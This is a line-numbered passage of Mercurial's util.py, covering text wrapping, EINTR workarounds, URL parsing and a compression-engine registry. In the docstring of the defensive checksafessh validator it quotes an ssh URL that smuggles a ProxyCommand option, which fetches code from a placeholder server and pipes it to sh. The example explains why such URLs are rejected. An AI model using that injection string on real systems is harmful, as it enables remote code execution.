2550 2772 # fit on *any* line (not just this one).
2551 2773 if chunks and colwidth(chunks[-1]) > width:
2552 2774 self._handle_long_word(chunks, cur_line, cur_len, width)
2553 2775
2554 2776 # If the last chunk on this line is all whitespace, drop it.
2555 2777 if (self.drop_whitespace and
2556 2778 cur_line and cur_line[-1].strip() == r''):
2557 2779 del cur_line[-1]
2558 2780
2559 2781 # Convert current line back to a string and store it in list
2560 2782 # of all lines (return value).
2561 2783 if cur_line:
2562 2784 lines.append(indent + r''.join(cur_line))
2563 2785
2564 2786 return lines
2565 2787
2566 2788 global MBTextWrapper
2567 2789 MBTextWrapper = tw
2568 2790 return tw(**kwargs)
2569 2791
2570 2792 def wrap(line, width, initindent='', hangindent=''):
2571 2793 maxindent = max(len(hangindent), len(initindent))
2572 2794 if width <= maxindent:
2573 2795 # adjust for weird terminal size
2574 2796 width = max(78, maxindent + 1)
2575 2797 line = line.decode(pycompat.sysstr(encoding.encoding),
2576 2798 pycompat.sysstr(encoding.encodingmode))
2577 2799 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2578 2800 pycompat.sysstr(encoding.encodingmode))
2579 2801 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2580 2802 pycompat.sysstr(encoding.encodingmode))
2581 2803 wrapper = MBTextWrapper(width=width,
2582 2804 initial_indent=initindent,
2583 2805 subsequent_indent=hangindent)
2584 2806 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2585 2807
2586 2808 if (pyplatform.python_implementation() == 'CPython' and
2587 2809 sys.version_info < (3, 0)):
2588 2810 # There is an issue in CPython that some IO methods do not handle EINTR
2589 2811 # correctly. The following table shows what CPython version (and functions)
2590 2812 # are affected (buggy: has the EINTR bug, okay: otherwise):
2591 2813 #
2592 2814 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2593 2815 # --------------------------------------------------
2594 2816 # fp.__iter__ | buggy | buggy | okay
2595 2817 # fp.read* | buggy | okay [1] | okay
2596 2818 #
2597 2819 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2598 2820 #
2599 2821 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2600 2822 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2601 2823 #
2602 2824 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2603 2825 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2604 2826 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2605 2827 # fp.__iter__ but not other fp.read* methods.
2606 2828 #
2607 2829 # On modern systems like Linux, the "read" syscall cannot be interrupted
2608 2830 # when reading "fast" files like on-disk files. So the EINTR issue only
2609 2831 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2610 2832 # files approximately as "fast" files and use the fast (unsafe) code path,
2611 2833 # to minimize the performance impact.
2612 2834 if sys.version_info >= (2, 7, 4):
2613 2835 # fp.readline deals with EINTR correctly, use it as a workaround.
2614 2836 def _safeiterfile(fp):
2615 2837 return iter(fp.readline, '')
2616 2838 else:
2617 2839 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2618 2840 # note: this may block longer than necessary because of bufsize.
2619 2841 def _safeiterfile(fp, bufsize=4096):
2620 2842 fd = fp.fileno()
2621 2843 line = ''
2622 2844 while True:
2623 2845 try:
2624 2846 buf = os.read(fd, bufsize)
2625 2847 except OSError as ex:
2626 2848 # os.read only raises EINTR before any data is read
2627 2849 if ex.errno == errno.EINTR:
2628 2850 continue
2629 2851 else:
2630 2852 raise
2631 2853 line += buf
2632 2854 if '\n' in buf:
2633 2855 splitted = line.splitlines(True)
2634 2856 line = ''
2635 2857 for l in splitted:
2636 2858 if l[-1] == '\n':
2637 2859 yield l
2638 2860 else:
2639 2861 line = l
2640 2862 if not buf:
2641 2863 break
2642 2864 if line:
2643 2865 yield line
2644 2866
2645 2867 def iterfile(fp):
2646 2868 fastpath = True
2647 2869 if type(fp) is file:
2648 2870 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2649 2871 if fastpath:
2650 2872 return fp
2651 2873 else:
2652 2874 return _safeiterfile(fp)
2653 2875 else:
2654 2876 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2655 2877 def iterfile(fp):
2656 2878 return fp
2657 2879
2658 2880 def iterlines(iterator):
2659 2881 for chunk in iterator:
2660 2882 for line in chunk.splitlines():
2661 2883 yield line
2662 2884
2663 2885 def expandpath(path):
2664 2886 return os.path.expanduser(os.path.expandvars(path))
2665 2887
2666 2888 def hgcmd():
2667 2889 """Return the command used to execute current hg
2668 2890
2669 2891 This is different from hgexecutable() because on Windows we want
2670 2892 to avoid things opening new shell windows like batch files, so we
2671 2893 get either the python call or current executable.
2672 2894 """
2673 2895 if mainfrozen():
2674 2896 if getattr(sys, 'frozen', None) == 'macosx_app':
2675 2897 # Env variable set by py2app
2676 2898 return [encoding.environ['EXECUTABLEPATH']]
2677 2899 else:
2678 2900 return [pycompat.sysexecutable]
2679 2901 return gethgcmd()
2680 2902
2681 2903 def rundetached(args, condfn):
2682 2904 """Execute the argument list in a detached process.
2683 2905
2684 2906 condfn is a callable which is called repeatedly and should return
2685 2907 True once the child process is known to have started successfully.
2686 2908 At this point, the child process PID is returned. If the child
2687 2909 process fails to start or finishes before condfn() evaluates to
2688 2910 True, return -1.
2689 2911 """
2690 2912 # Windows case is easier because the child process is either
2691 2913 # successfully starting and validating the condition or exiting
2692 2914 # on failure. We just poll on its PID. On Unix, if the child
2693 2915 # process fails to start, it will be left in a zombie state until
2694 2916 # the parent wait on it, which we cannot do since we expect a long
2695 2917 # running process on success. Instead we listen for SIGCHLD telling
2696 2918 # us our child process terminated.
2697 2919 terminated = set()
2698 2920 def handler(signum, frame):
2699 2921 terminated.add(os.wait())
2700 2922 prevhandler = None
2701 2923 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2702 2924 if SIGCHLD is not None:
2703 2925 prevhandler = signal.signal(SIGCHLD, handler)
2704 2926 try:
2705 2927 pid = spawndetached(args)
2706 2928 while not condfn():
2707 2929 if ((pid in terminated or not testpid(pid))
2708 2930 and not condfn()):
2709 2931 return -1
2710 2932 time.sleep(0.1)
2711 2933 return pid
2712 2934 finally:
2713 2935 if prevhandler is not None:
2714 2936 signal.signal(signal.SIGCHLD, prevhandler)
2715 2937
2716 2938 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2717 2939 """Return the result of interpolating items in the mapping into string s.
2718 2940
2719 2941 prefix is a single character string, or a two character string with
2720 2942 a backslash as the first character if the prefix needs to be escaped in
2721 2943 a regular expression.
2722 2944
2723 2945 fn is an optional function that will be applied to the replacement text
2724 2946 just before replacement.
2725 2947
2726 2948 escape_prefix is an optional flag that allows using doubled prefix for
2727 2949 its escaping.
2728 2950 """
2729 2951 fn = fn or (lambda s: s)
2730 2952 patterns = '|'.join(mapping.keys())
2731 2953 if escape_prefix:
2732 2954 patterns += '|' + prefix
2733 2955 if len(prefix) > 1:
2734 2956 prefix_char = prefix[1:]
2735 2957 else:
2736 2958 prefix_char = prefix
2737 2959 mapping[prefix_char] = prefix_char
2738 2960 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2739 2961 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2740 2962
2741 2963 def getport(port):
2742 2964 """Return the port for a given network service.
2743 2965
2744 2966 If port is an integer, it's returned as is. If it's a string, it's
2745 2967 looked up using socket.getservbyname(). If there's no matching
2746 2968 service, error.Abort is raised.
2747 2969 """
2748 2970 try:
2749 2971 return int(port)
2750 2972 except ValueError:
2751 2973 pass
2752 2974
2753 2975 try:
2754 2976 return socket.getservbyname(pycompat.sysstr(port))
2755 2977 except socket.error:
2756 2978 raise Abort(_("no port number associated with service '%s'") % port)
2757 2979
2758 2980 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2759 2981 '0': False, 'no': False, 'false': False, 'off': False,
2760 2982 'never': False}
2761 2983
2762 2984 def parsebool(s):
2763 2985 """Parse s into a boolean.
2764 2986
2765 2987 If s is not a valid boolean, returns None.
2766 2988 """
2767 2989 return _booleans.get(s.lower(), None)
2768 2990
2769 2991 _hextochr = dict((a + b, chr(int(a + b, 16)))
2770 2992 for a in string.hexdigits for b in string.hexdigits)
2771 2993
2772 2994 class url(object):
2773 2995 r"""Reliable URL parser.
2774 2996
2775 2997 This parses URLs and provides attributes for the following
2776 2998 components:
2777 2999
2778 3000 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2779 3001
2780 3002 Missing components are set to None. The only exception is
2781 3003 fragment, which is set to '' if present but empty.
2782 3004
2783 3005 If parsefragment is False, fragment is included in query. If
2784 3006 parsequery is False, query is included in path. If both are
2785 3007 False, both fragment and query are included in path.
2786 3008
2787 3009 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2788 3010
2789 3011 Note that for backward compatibility reasons, bundle URLs do not
2790 3012 take host names. That means 'bundle://../' has a path of '../'.
2791 3013
2792 3014 Examples:
2793 3015
2794 3016 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2795 3017 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2796 3018 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2797 3019 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2798 3020 >>> url(b'file:///home/joe/repo')
2799 3021 <url scheme: 'file', path: '/home/joe/repo'>
2800 3022 >>> url(b'file:///c:/temp/foo/')
2801 3023 <url scheme: 'file', path: 'c:/temp/foo/'>
2802 3024 >>> url(b'bundle:foo')
2803 3025 <url scheme: 'bundle', path: 'foo'>
2804 3026 >>> url(b'bundle://../foo')
2805 3027 <url scheme: 'bundle', path: '../foo'>
2806 3028 >>> url(br'c:\foo\bar')
2807 3029 <url path: 'c:\\foo\\bar'>
2808 3030 >>> url(br'\\blah\blah\blah')
2809 3031 <url path: '\\\\blah\\blah\\blah'>
2810 3032 >>> url(br'\\blah\blah\blah#baz')
2811 3033 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2812 3034 >>> url(br'file:///C:\users\me')
2813 3035 <url scheme: 'file', path: 'C:\\users\\me'>
2814 3036
2815 3037 Authentication credentials:
2816 3038
2817 3039 >>> url(b'ssh://joe:xyz@x/repo')
2818 3040 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2819 3041 >>> url(b'ssh://joe@x/repo')
2820 3042 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2821 3043
2822 3044 Query strings and fragments:
2823 3045
2824 3046 >>> url(b'http://host/a?b#c')
2825 3047 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2826 3048 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2827 3049 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2828 3050
2829 3051 Empty path:
2830 3052
2831 3053 >>> url(b'')
2832 3054 <url path: ''>
2833 3055 >>> url(b'#a')
2834 3056 <url path: '', fragment: 'a'>
2835 3057 >>> url(b'http://host/')
2836 3058 <url scheme: 'http', host: 'host', path: ''>
2837 3059 >>> url(b'http://host/#a')
2838 3060 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2839 3061
2840 3062 Only scheme:
2841 3063
2842 3064 >>> url(b'http:')
2843 3065 <url scheme: 'http'>
2844 3066 """
2845 3067
2846 3068 _safechars = "!~*'()+"
2847 3069 _safepchars = "/!~*'()+:\\"
2848 3070 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2849 3071
2850 3072 def __init__(self, path, parsequery=True, parsefragment=True):
2851 3073 # We slowly chomp away at path until we have only the path left
2852 3074 self.scheme = self.user = self.passwd = self.host = None
2853 3075 self.port = self.path = self.query = self.fragment = None
2854 3076 self._localpath = True
2855 3077 self._hostport = ''
2856 3078 self._origpath = path
2857 3079
2858 3080 if parsefragment and '#' in path:
2859 3081 path, self.fragment = path.split('#', 1)
2860 3082
2861 3083 # special case for Windows drive letters and UNC paths
2862 3084 if hasdriveletter(path) or path.startswith('\\\\'):
2863 3085 self.path = path
2864 3086 return
2865 3087
2866 3088 # For compatibility reasons, we can't handle bundle paths as
2867 3089 # normal URLS
2868 3090 if path.startswith('bundle:'):
2869 3091 self.scheme = 'bundle'
2870 3092 path = path[7:]
2871 3093 if path.startswith('//'):
2872 3094 path = path[2:]
2873 3095 self.path = path
2874 3096 return
2875 3097
2876 3098 if self._matchscheme(path):
2877 3099 parts = path.split(':', 1)
2878 3100 if parts[0]:
2879 3101 self.scheme, path = parts
2880 3102 self._localpath = False
2881 3103
2882 3104 if not path:
2883 3105 path = None
2884 3106 if self._localpath:
2885 3107 self.path = ''
2886 3108 return
2887 3109 else:
2888 3110 if self._localpath:
2889 3111 self.path = path
2890 3112 return
2891 3113
2892 3114 if parsequery and '?' in path:
2893 3115 path, self.query = path.split('?', 1)
2894 3116 if not path:
2895 3117 path = None
2896 3118 if not self.query:
2897 3119 self.query = None
2898 3120
2899 3121 # // is required to specify a host/authority
2900 3122 if path and path.startswith('//'):
2901 3123 parts = path[2:].split('/', 1)
2902 3124 if len(parts) > 1:
2903 3125 self.host, path = parts
2904 3126 else:
2905 3127 self.host = parts[0]
2906 3128 path = None
2907 3129 if not self.host:
2908 3130 self.host = None
2909 3131 # path of file:///d is /d
2910 3132 # path of file:///d:/ is d:/, not /d:/
2911 3133 if path and not hasdriveletter(path):
2912 3134 path = '/' + path
2913 3135
2914 3136 if self.host and '@' in self.host:
2915 3137 self.user, self.host = self.host.rsplit('@', 1)
2916 3138 if ':' in self.user:
2917 3139 self.user, self.passwd = self.user.split(':', 1)
2918 3140 if not self.host:
2919 3141 self.host = None
2920 3142
2921 3143 # Don't split on colons in IPv6 addresses without ports
2922 3144 if (self.host and ':' in self.host and
2923 3145 not (self.host.startswith('[') and self.host.endswith(']'))):
2924 3146 self._hostport = self.host
2925 3147 self.host, self.port = self.host.rsplit(':', 1)
2926 3148 if not self.host:
2927 3149 self.host = None
2928 3150
2929 3151 if (self.host and self.scheme == 'file' and
2930 3152 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2931 3153 raise Abort(_('file:// URLs can only refer to localhost'))
2932 3154
2933 3155 self.path = path
2934 3156
2935 3157 # leave the query string escaped
2936 3158 for a in ('user', 'passwd', 'host', 'port',
2937 3159 'path', 'fragment'):
2938 3160 v = getattr(self, a)
2939 3161 if v is not None:
2940 3162 setattr(self, a, urlreq.unquote(v))
2941 3163
2942 3164 @encoding.strmethod
2943 3165 def __repr__(self):
2944 3166 attrs = []
2945 3167 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2946 3168 'query', 'fragment'):
2947 3169 v = getattr(self, a)
2948 3170 if v is not None:
2949 3171 attrs.append('%s: %r' % (a, v))
2950 3172 return '<url %s>' % ', '.join(attrs)
2951 3173
2952 3174 def __bytes__(self):
2953 3175 r"""Join the URL's components back into a URL string.
2954 3176
2955 3177 Examples:
2956 3178
2957 3179 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2958 3180 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2959 3181 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2960 3182 'http://user:pw@host:80/?foo=bar&baz=42'
2961 3183 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2962 3184 'http://user:pw@host:80/?foo=bar%3dbaz'
2963 3185 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2964 3186 'ssh://user:pw@[::1]:2200//home/joe#'
2965 3187 >>> bytes(url(b'http://localhost:80//'))
2966 3188 'http://localhost:80//'
2967 3189 >>> bytes(url(b'http://localhost:80/'))
2968 3190 'http://localhost:80/'
2969 3191 >>> bytes(url(b'http://localhost:80'))
2970 3192 'http://localhost:80/'
2971 3193 >>> bytes(url(b'bundle:foo'))
2972 3194 'bundle:foo'
2973 3195 >>> bytes(url(b'bundle://../foo'))
2974 3196 'bundle:../foo'
2975 3197 >>> bytes(url(b'path'))
2976 3198 'path'
2977 3199 >>> bytes(url(b'file:///tmp/foo/bar'))
2978 3200 'file:///tmp/foo/bar'
2979 3201 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2980 3202 'file:///c:/tmp/foo/bar'
2981 3203 >>> print(url(br'bundle:foo\bar'))
2982 3204 bundle:foo\bar
2983 3205 >>> print(url(br'file:///D:\data\hg'))
2984 3206 file:///D:\data\hg
2985 3207 """
2986 3208 if self._localpath:
2987 3209 s = self.path
2988 3210 if self.scheme == 'bundle':
2989 3211 s = 'bundle:' + s
2990 3212 if self.fragment:
2991 3213 s += '#' + self.fragment
2992 3214 return s
2993 3215
2994 3216 s = self.scheme + ':'
2995 3217 if self.user or self.passwd or self.host:
2996 3218 s += '//'
2997 3219 elif self.scheme and (not self.path or self.path.startswith('/')
2998 3220 or hasdriveletter(self.path)):
2999 3221 s += '//'
3000 3222 if hasdriveletter(self.path):
3001 3223 s += '/'
3002 3224 if self.user:
3003 3225 s += urlreq.quote(self.user, safe=self._safechars)
3004 3226 if self.passwd:
3005 3227 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3006 3228 if self.user or self.passwd:
3007 3229 s += '@'
3008 3230 if self.host:
3009 3231 if not (self.host.startswith('[') and self.host.endswith(']')):
3010 3232 s += urlreq.quote(self.host)
3011 3233 else:
3012 3234 s += self.host
3013 3235 if self.port:
3014 3236 s += ':' + urlreq.quote(self.port)
3015 3237 if self.host:
3016 3238 s += '/'
3017 3239 if self.path:
3018 3240 # TODO: similar to the query string, we should not unescape the
3019 3241 # path when we store it, the path might contain '%2f' = '/',
3020 3242 # which we should *not* escape.
3021 3243 s += urlreq.quote(self.path, safe=self._safepchars)
3022 3244 if self.query:
3023 3245 # we store the query in escaped form.
3024 3246 s += '?' + self.query
3025 3247 if self.fragment is not None:
3026 3248 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3027 3249 return s
3028 3250
3029 3251 __str__ = encoding.strmethod(__bytes__)
3030 3252
3031 3253 def authinfo(self):
3032 3254 user, passwd = self.user, self.passwd
3033 3255 try:
3034 3256 self.user, self.passwd = None, None
3035 3257 s = bytes(self)
3036 3258 finally:
3037 3259 self.user, self.passwd = user, passwd
3038 3260 if not self.user:
3039 3261 return (s, None)
3040 3262 # authinfo[1] is passed to urllib2 password manager, and its
3041 3263 # URIs must not contain credentials. The host is passed in the
3042 3264 # URIs list because Python < 2.4.3 uses only that to search for
3043 3265 # a password.
3044 3266 return (s, (None, (s, self.host),
3045 3267 self.user, self.passwd or ''))
3046 3268
3047 3269 def isabs(self):
3048 3270 if self.scheme and self.scheme != 'file':
3049 3271 return True # remote URL
3050 3272 if hasdriveletter(self.path):
3051 3273 return True # absolute for our purposes - can't be joined()
3052 3274 if self.path.startswith(br'\\'):
3053 3275 return True # Windows UNC path
3054 3276 if self.path.startswith('/'):
3055 3277 return True # POSIX-style
3056 3278 return False
3057 3279
3058 3280 def localpath(self):
3059 3281 if self.scheme == 'file' or self.scheme == 'bundle':
3060 3282 path = self.path or '/'
3061 3283 # For Windows, we need to promote hosts containing drive
3062 3284 # letters to paths with drive letters.
3063 3285 if hasdriveletter(self._hostport):
3064 3286 path = self._hostport + '/' + self.path
3065 3287 elif (self.host is not None and self.path
3066 3288 and not hasdriveletter(path)):
3067 3289 path = '/' + path
3068 3290 return path
3069 3291 return self._origpath
3070 3292
3071 3293 def islocal(self):
3072 3294 '''whether localpath will return something that posixfile can open'''
3073 3295 return (not self.scheme or self.scheme == 'file'
3074 3296 or self.scheme == 'bundle')
3075 3297
3076 3298 def hasscheme(path):
3077 3299 return bool(url(path).scheme)
3078 3300
3079 3301 def hasdriveletter(path):
3080 3302 return path and path[1:2] == ':' and path[0:1].isalpha()
3081 3303
3082 3304 def urllocalpath(path):
3083 3305 return url(path, parsequery=False, parsefragment=False).localpath()
3084 3306
3085 3307 def checksafessh(path):
3086 3308 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3087 3309
3088 3310 This is a sanity check for ssh urls. ssh will parse the first item as
3089 3311 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3090 3312 Let's prevent these potentially exploited urls entirely and warn the
3091 3313 user.
3092 3314
3093 3315 Raises an error.Abort when the url is unsafe.
3094 3316 """
3095 3317 path = urlreq.unquote(path)
3096 3318 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3097 3319 raise error.Abort(_('potentially unsafe url: %r') %
3098 3320 (path,))
3099 3321
3100 3322 def hidepassword(u):
3101 3323 '''hide user credential in a url string'''
3102 3324 u = url(u)
3103 3325 if u.passwd:
3104 3326 u.passwd = '***'
3105 3327 return bytes(u)
3106 3328
3107 3329 def removeauth(u):
3108 3330 '''remove all authentication information from a url string'''
3109 3331 u = url(u)
3110 3332 u.user = u.passwd = None
3111 3333 return str(u)
3112 3334
3113 3335 timecount = unitcountfn(
3114 3336 (1, 1e3, _('%.0f s')),
3115 3337 (100, 1, _('%.1f s')),
3116 3338 (10, 1, _('%.2f s')),
3117 3339 (1, 1, _('%.3f s')),
3118 3340 (100, 0.001, _('%.1f ms')),
3119 3341 (10, 0.001, _('%.2f ms')),
3120 3342 (1, 0.001, _('%.3f ms')),
3121 3343 (100, 0.000001, _('%.1f us')),
3122 3344 (10, 0.000001, _('%.2f us')),
3123 3345 (1, 0.000001, _('%.3f us')),
3124 3346 (100, 0.000000001, _('%.1f ns')),
3125 3347 (10, 0.000000001, _('%.2f ns')),
3126 3348 (1, 0.000000001, _('%.3f ns')),
3127 3349 )
3128 3350
3129 3351 _timenesting = [0]
3130 3352
3131 3353 def timed(func):
3132 3354 '''Report the execution time of a function call to stderr.
3133 3355
3134 3356 During development, use as a decorator when you need to measure
3135 3357 the cost of a function, e.g. as follows:
3136 3358
3137 3359 @util.timed
3138 3360 def foo(a, b, c):
3139 3361 pass
3140 3362 '''
3141 3363
3142 3364 def wrapper(*args, **kwargs):
3143 3365 start = timer()
3144 3366 indent = 2
3145 3367 _timenesting[0] += indent
3146 3368 try:
3147 3369 return func(*args, **kwargs)
3148 3370 finally:
3149 3371 elapsed = timer() - start
3150 3372 _timenesting[0] -= indent
3151 3373 stderr.write('%s%s: %s\n' %
3152 3374 (' ' * _timenesting[0], func.__name__,
3153 3375 timecount(elapsed)))
3154 3376 return wrapper
3155 3377
3156 3378 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3157 3379 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3158 3380
3159 3381 def sizetoint(s):
3160 3382 '''Convert a space specifier to a byte count.
3161 3383
3162 3384 >>> sizetoint(b'30')
3163 3385 30
3164 3386 >>> sizetoint(b'2.2kb')
3165 3387 2252
3166 3388 >>> sizetoint(b'6M')
3167 3389 6291456
3168 3390 '''
3169 3391 t = s.strip().lower()
3170 3392 try:
3171 3393 for k, u in _sizeunits:
3172 3394 if t.endswith(k):
3173 3395 return int(float(t[:-len(k)]) * u)
3174 3396 return int(t)
3175 3397 except ValueError:
3176 3398 raise error.ParseError(_("couldn't parse size: %s") % s)
3177 3399
3178 3400 class hooks(object):
3179 3401 '''A collection of hook functions that can be used to extend a
3180 3402 function's behavior. Hooks are called in lexicographic order,
3181 3403 based on the names of their sources.'''
3182 3404
3183 3405 def __init__(self):
3184 3406 self._hooks = []
3185 3407
3186 3408 def add(self, source, hook):
3187 3409 self._hooks.append((source, hook))
3188 3410
3189 3411 def __call__(self, *args):
3190 3412 self._hooks.sort(key=lambda x: x[0])
3191 3413 results = []
3192 3414 for source, hook in self._hooks:
3193 3415 results.append(hook(*args))
3194 3416 return results
3195 3417
3196 3418 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3197 3419 '''Yields lines for a nicely formatted stacktrace.
3198 3420 Skips the 'skip' last entries, then return the last 'depth' entries.
3199 3421 Each file+linenumber is formatted according to fileline.
3200 3422 Each line is formatted according to line.
3201 3423 If line is None, it yields:
3202 3424 length of longest filepath+line number,
3203 3425 filepath+linenumber,
3204 3426 function
3205 3427
3206 3428 Not be used in production code but very convenient while developing.
3207 3429 '''
3208 3430 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3209 3431 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3210 3432 ][-depth:]
3211 3433 if entries:
3212 3434 fnmax = max(len(entry[0]) for entry in entries)
3213 3435 for fnln, func in entries:
3214 3436 if line is None:
3215 3437 yield (fnmax, fnln, func)
3216 3438 else:
3217 3439 yield line % (fnmax, fnln, func)
3218 3440
3219 3441 def debugstacktrace(msg='stacktrace', skip=0,
3220 3442 f=stderr, otherf=stdout, depth=0):
3221 3443 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3222 3444 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3223 3445 By default it will flush stdout first.
3224 3446 It can be used everywhere and intentionally does not require an ui object.
3225 3447 Not be used in production code but very convenient while developing.
3226 3448 '''
3227 3449 if otherf:
3228 3450 otherf.flush()
3229 3451 f.write('%s at:\n' % msg.rstrip())
3230 3452 for line in getstackframes(skip + 1, depth=depth):
3231 3453 f.write(line)
3232 3454 f.flush()
3233 3455
3234 3456 class dirs(object):
3235 3457 '''a multiset of directory names from a dirstate or manifest'''
3236 3458
3237 3459 def __init__(self, map, skip=None):
3238 3460 self._dirs = {}
3239 3461 addpath = self.addpath
3240 3462 if safehasattr(map, 'iteritems') and skip is not None:
3241 3463 for f, s in map.iteritems():
3242 3464 if s[0] != skip:
3243 3465 addpath(f)
3244 3466 else:
3245 3467 for f in map:
3246 3468 addpath(f)
3247 3469
3248 3470 def addpath(self, path):
3249 3471 dirs = self._dirs
3250 3472 for base in finddirs(path):
3251 3473 if base in dirs:
3252 3474 dirs[base] += 1
3253 3475 return
3254 3476 dirs[base] = 1
3255 3477
3256 3478 def delpath(self, path):
3257 3479 dirs = self._dirs
3258 3480 for base in finddirs(path):
3259 3481 if dirs[base] > 1:
3260 3482 dirs[base] -= 1
3261 3483 return
3262 3484 del dirs[base]
3263 3485
3264 3486 def __iter__(self):
3265 3487 return iter(self._dirs)
3266 3488
3267 3489 def __contains__(self, d):
3268 3490 return d in self._dirs
3269 3491
3270 3492 if safehasattr(parsers, 'dirs'):
3271 3493 dirs = parsers.dirs
3272 3494
3273 3495 def finddirs(path):
3274 3496 pos = path.rfind('/')
3275 3497 while pos != -1:
3276 3498 yield path[:pos]
3277 3499 pos = path.rfind('/', 0, pos)
3278 3500
3279 3501 # compression code
3280 3502
3281 3503 SERVERROLE = 'server'
3282 3504 CLIENTROLE = 'client'
3283 3505
3284 3506 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3285 3507 (u'name', u'serverpriority',
3286 3508 u'clientpriority'))
3287 3509
3288 3510 class compressormanager(object):
3289 3511 """Holds registrations of various compression engines.
3290 3512
3291 3513 This class essentially abstracts the differences between compression
3292 3514 engines to allow new compression formats to be added easily, possibly from
3293 3515 extensions.
3294 3516
3295 3517 Compressors are registered against the global instance by calling its
3296 3518 ``register()`` method.
3297 3519 """
3298 3520 def __init__(self):
3299 3521 self._engines = {}
3300 3522 # Bundle spec human name to engine name.
3301 3523 self._bundlenames = {}
3302 3524 # Internal bundle identifier to engine name.
3303 3525 self._bundletypes = {}
3304 3526 # Revlog header to engine name.
3305 3527 self._revlogheaders = {}
3306 3528 # Wire proto identifier to engine name.
3307 3529 self._wiretypes = {}
3308 3530
3309 3531 def __getitem__(self, key):
3310 3532 return self._engines[key]
3311 3533
3312 3534 def __contains__(self, key):
3313 3535 return key in self._engines
3314 3536
3315 3537 def __iter__(self):
3316 3538 return iter(self._engines.keys())
3317 3539
3318 3540 def register(self, engine):
3319 3541 """Register a compression engine with the manager.
3320 3542
3321 3543 The argument must be a ``compressionengine`` instance.
3322 3544 """
3323 3545 if not isinstance(engine, compressionengine):
3324 3546 raise ValueError(_('argument must be a compressionengine'))
3325 3547
3326 3548 name = engine.name()
3327 3549
3328 3550 if name in self._engines:
3329 3551 raise error.Abort(_('compression engine %s already registered') %
3330 3552 name)
3331 3553
3332 3554 bundleinfo = engine.bundletype()
3333 3555 if bundleinfo:
3334 3556 bundlename, bundletype = bundleinfo
3335 3557
3336 3558 if bundlename in self._bundlenames:
3337 3559 raise error.Abort(_('bundle name %s already registered') %
3338 3560 bundlename)
3339 3561 if bundletype in self._bundletypes:
3340 3562 raise error.Abort(_('bundle type %s already registered by %s') %
3341 3563 (bundletype, self._bundletypes[bundletype]))
3342 3564
3343 3565 # No external facing name declared.
3344 3566 if bundlename:
3345 3567 self._bundlenames[bundlename] = name
3346 3568
3347 3569 self._bundletypes[bundletype] = name
3348 3570
3349 3571 wiresupport = engine.wireprotosupport()
3350 3572 if wiresupport:
3351 3573 wiretype = wiresupport.name
3352 3574 if wiretype in self._wiretypes:
3353 3575 raise error.Abort(_('wire protocol compression %s already '
3354 3576 'registered by %s') %
3355 3577 (wiretype, self._wiretypes[wiretype]))
3356 3578
3357 3579 self._wiretypes[wiretype] = name
3358 3580
3359 3581 revlogheader = engine.revlogheader()
3360 3582 if revlogheader and revlogheader in self._revlogheaders:
3361 3583 raise error.Abort(_('revlog header %s already registered by %s') %
3362 3584 (revlogheader, self._revlogheaders[revlogheader]))
3363 3585
3364 3586 if revlogheader:
3365 3587 self._revlogheaders[revlogheader] = name
3366 3588
3367 3589 self._engines[name] = engine
3368 3590
3369 3591 @property
3370 3592 def supportedbundlenames(self):
3371 3593 return set(self._bundlenames.keys())
3372 3594
3373 3595 @property
3374 3596 def supportedbundletypes(self):
3375 3597 return set(self._bundletypes.keys())
3376 3598
